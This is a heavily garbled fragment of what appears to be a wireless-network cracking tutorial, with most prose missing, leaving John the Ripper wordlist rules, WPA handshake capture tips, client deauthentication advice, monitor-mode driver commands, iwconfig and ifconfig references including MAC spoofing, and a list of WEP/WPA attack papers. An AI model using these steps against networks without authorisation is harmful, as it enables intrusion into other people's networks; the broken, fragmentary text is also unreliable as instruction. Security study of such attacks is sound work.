sE3$[0-9]
sE3$[0-9]$[0-9]
sE3$[0-9]$[0-9]$[0-9]
sl1$[0-9]
sl1$[0-9]$[0-9]
sl1$[0-9]$[0-9]$[0-9]
sE3sl1$[0-9]
sE3sl1$[0-9]$[0-9]
sE3sl1$[0-9]$[0-9]$[0-9]

, dictionary
passphrases.

passphrase ;
! JtR
passphrases
dictionaries.
John,
.
wordlist coWPAtty 10.201 . John
489.989.
45.720.022! ,
.
out
there. ,

, 45 passphrases
, 6 ...
45
, ,
WPA passphrase , ..

13. ...
Four-way Handshake!
Opening psk-01.cap
Opening psk-02.cap
Opening psk-03.cap
Opening psk-04.cap
Read 1827 packets.
No valid WPA handshakes found.

[]

 four-way handshake. '

tips:

H mode client AP. , ,

mode client/AP G, handshake.
APs clients turbo mode
. drivers mode iwconfig
mode (. iwconfig).
1, 2, 5.5 11Mbit 6, 9, 12, 18, 24, 36, 48, 54Mbit G..
AP auto,
1MB, 2MB, 11MB, 54MB
AP.
-c <channel of AP> airodump-ng.
network/connection managers
mode .
AP client
(corrupted) .
drivers, driver,
.
, client
handshake.
deauth ,
client . deauth . deauth
client
four-way handshake. deauths clients
broadcasting. client deauth ,
tcpdump wireshark ACK client .
, client deauthentication .
WPA Packet Capture Explained tutorial
AP client

four-way handshake. , ,
.
, airodump-ng BSSID
IV's.
AP. BSSID
, acknowledgements (ACKs), .
BSSID , airodump.

14.
monitor mode chipsets atheros:
interface:
airmon-ng stop [interface]
ifconfig [interface] down
Intel PRO/Wireless 3945ABG
modprobe -r iwl3945
modprobe ipwraw
modprobe iwl3945

[]

Intel PRO/Wireless 2100/2200

modprobe -r ipw2100/2200
modprobe ipwraw
modprobe ipw2100/2200
interface:
ifconfig [interface] up
airmon-ng start [interface]
: (monitor mode enabled)

-todo open wep wlan (dhcp):

iwconfig [interface] mode managed key [WEP key]

(128 bit WEP - 26 hex , 64 bit WEP - 10)
iwconfig essid [ESSID]
( ESSID )
dhclient [interface]
( IP address, netmask, DNS server & default gateway P)

open wep wlan (manual):

iwconfig [interface] mode managed key [WEP key]
(128 bit WEP use 26 hex characters, 64 bit WEP uses 10)
iwconfig essid "[ESSID]"
ifconfig [interface] [IP address] netmask [subnetmask]
route add default gw [IP of default gateway]
(default gateway, IP Access Point)
echo nameserver [IP address of DNS server] >> /etc/resolve.conf
(Configure DNS server)

Madwifi-ng Commands:
madwifi access points (VAPS), wireless
wireless . (wireless card = wifi0)
wlanconfig athx destroy
( athx VAP)
wlanconfig athx create wlandev wifi0 wlanmode [sta|adhoc|ap|monitor]
athx VAP

ifconfig Commands:
ifconfig [interface] up
( interface)
ifconfig [interface] down
( interface)
ifconfig [interface] [IP address] netmask [subnet-mask]
( IP subnet-mask)
ifconfig [interface] hw ether [MAC]
( mac address wireless )

[]

iwconfig Commands:
iwconfig [interface] mode [master|managed|adhoc|monitor]
iwconfig [interface] essid [any|essid]
iwconfig [interface] key [hex|s:ascii|off|open]
iwconfig [interface] channel [#|auto]
iwconfig [interface] freq 2.422G
iwconfig [interface] ap [mac address]
iwconfig [interface] rate [auto|#M]

iwpriv Commands:
iwpriv [interface] monitor [A] [B]
[A]
0 = disable monitor mode
1 = enable monitor mode with Prism2 header
2 = enable monitor mode with no Prism2
[B] Channel to monitor (1-14)

mac address vendor list

00:11:2F
00:11:25
00:11:20
00:11:22
00:11:95
00:11:98
00:0C:87
00:0C:F1

ASUSTek Computer Inc.

Cisco Systems
IBM Corporation
Cimsys
D-Link
PrismMedia
Amd
Intel

http://anonsvn.wireshark.org/wireshark/trunk/manuf

e-books
Sohail/Vivek: Caffe-Latte attack
hakin9: WiFi Security
Bittau/Handley/Lackey: The final nail in wep's coffin
ittau:Fragmentation Attack in Practice
Foundstone (antoniewitz): 802.11 Attacks
Levente Buttyn/Lszl Dra: WiFi Security WEP and 802.11i
Richard Yang:Security and Cooperation in Wireless and Mobile Networks
Pyshkin/Tews/Weinmann:Breaking 104 bit WEP in less than 60 seconds
Changhua/Mitchell: Analysis of the 802.11i 4-Way Handshake
PGP corp: Introduction to cryptography
Logicallysecure:Wireless linux commands
websites
Wikipedia
Aicrack-ng wiki
wi-fiplanet.com
infoworld.com
airtightnetworks.com
remote-exploit.org
madwifi.org

[]

lifehack.ws
kismetwireless.net

: CC 3.0 attribution-sharealike
[]